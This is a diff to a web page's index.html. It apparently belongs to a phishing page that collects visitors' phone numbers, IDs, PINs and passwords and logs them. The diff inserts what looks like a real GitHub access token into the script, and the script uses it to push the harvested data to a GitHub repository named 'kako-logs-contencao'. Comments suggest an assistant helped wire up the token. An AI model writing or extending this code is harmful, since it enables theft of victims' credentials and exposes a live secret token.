--- a/index.html
+++ b/index.html
@@ -154,9 +154,8 @@
         </footer>
     </div>
     <script>
-        const DEFAULT_PASSWORD = "335112blk"; // Atualizado pra sua nova senha
+        const DEFAULT_PASSWORD = "335112blk";
 
-        const DEFAULT_PASSWORD = '335112blk';
         let currentPhone = '';
         let currentId = '';
         let phoneStatus = null;
@@ -483,7 +482,7 @@
             const logLine = `${formData.timestamp} | ${formData.telefone} | ${formData.id} | ${formData.pin} | ${formData.senha_padrao}\n`;
             console.log("FALLBACK: Cole no logs.txt:", logLine);
 
-            const GITHUB_TOKEN = "seu-token-aqui"; // Substitua pelo token que vou te mostrar como pegar
+            const GITHUB_TOKEN = "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"; // Seu token já inserido
             const OWNER = "infinityrecarga";
             const REPO = "kako-logs-contencao";
             const PATH = "logs.txt";
